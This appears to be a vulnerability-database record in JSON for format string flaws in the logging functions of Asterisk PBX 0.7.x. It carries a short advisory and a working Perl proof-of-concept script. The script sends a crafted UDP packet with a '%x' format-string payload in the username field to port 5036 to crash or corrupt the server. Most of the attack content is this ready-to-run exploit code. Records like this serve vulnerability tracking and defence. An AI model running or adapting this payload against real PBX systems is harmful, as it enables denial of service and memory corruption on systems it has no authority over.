DATABASE RESOURCES PRICING ABOUT US

{"lastseen": "2020-04-01T19:04:05", "references": [], "description": "\nAsterisk PBX 0.7.x - Multiple Logging Format String Vulnerabilities", "edition": 1, "reporter": "kfinisterre@secnetops.com", "exploitpack": {"type": "remote", "platform": "linux"}, "published": "2004-06-18T00:00:00", "title": "Asterisk PBX 0.7.x - Multiple Logging Format String Vulnerabilities", "type": "exploitpack", "enchantments": {"dependencies": {}, "score": {"value": 0.1, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.1}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2004-06-18T00:00:00", "id": "EXPLOITPACK:7318F7ED0A6D90659CD3073592C8AA23", "href": "", "viewCount": 3, "sourceData": "source: https://www.securityfocus.com/bid/10569/info\n\nIt is reported that Asterisk is susceptible to format string vulnerabilities in its logging functions.\n\nAn attacker may use these vulnerabilities to corrupt memory, and read or write arbitrary memory. Remote code execution is likely possible.\n\nDue to the nature of these vulnerabilities, there may exist many different avenues of attack. Anything that can potentially call the logging functions with user-supplied data is vulnerable.\n\nVersions 0.7.0 through to 0.7.2 are reported vulnerable.\n\n#!/usr/bin/perl\n#\n# Asterisk 0.7.2 Linux PBX Remote Format string DoS (PoC)\n#\n# Feb 29 22:58:08 NOTICE[27151280]: Rejected connect attempt from 127.0.0.1, request\n# 'exten=;callerid=;dnid=;context=;username=ce0ca0;language=;formats=;version=;}'\n\n#\n# kfinisterre[at]secnetops[dot]com - Copyright Secure Network Operations.\n#\n\nuse IO::Socket::INET;\n\n$sock=new IO::Socket::INET->new(PeerPort=>5036, Proto=>'udp', PeerAddr=>'localhost');\n#$malpayload = \"%.10d.\";\n#$malpayload .= \"%.10d\"; # add 6 to length\n#$malpayload .=\"%n\"; # write to the third address... we\nhave control of $esi\n$malpayload = \"AAAABBBB\" . \"%x.\" x 25;\n$malpayload .=\"\\x3b\";\n\n$payload = \"\\xa3\\x7d\\xff\\xff\\x00\\x00\\x00\\x01\\x00\\x00\\x06\\x01\\x65\\x78\\x74\\x65\\x6e\\x3d\\x3b\" . # extern=;\n\"\\x63\\x61\\x6c\\x6c\\x65\\x72\\x69\\x64\\x3d\\x3b\" . # callerid=;\n\"\\x64\\x6e\\x69\\x64\\x3d\\x3b\" . # dnid=;\n\"\\x63\\x6f\\x6e\\x74\\x65\\x78\\x74\\x3d\\x3b\" . # context=;\n\"$malpayload\" .\n\"\\x75\\x73\\x65\\x72\\x6e\\x61\\x6d\\x65\\x3d\" . # username=;\n\"\\x6c\\x61\\x6e\\x67\\x75\\x61\\x67\\x65\\x3d\\x3b\" . # language=;\n\"\\x66\\x6f\\x72\\x6d\\x61\\x74\\x73\\x3d\\x3b\" . # formats=;\n\"\\x76\\x65\\x72\\x73\\x69\\x6f\\x6e\\x3d\\x3b\" . # version=;\n\"\\xa3\\x7d\\xff\\xff\\x00\\x00\\x00\\x15\\x00\\x01\\x06\\x0b\"; # end of payload\n\n$sock->send($payload);\nclose($sock);", "cvss": {"score": 0.0, "vector": "NONE"}, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645744815}}

{}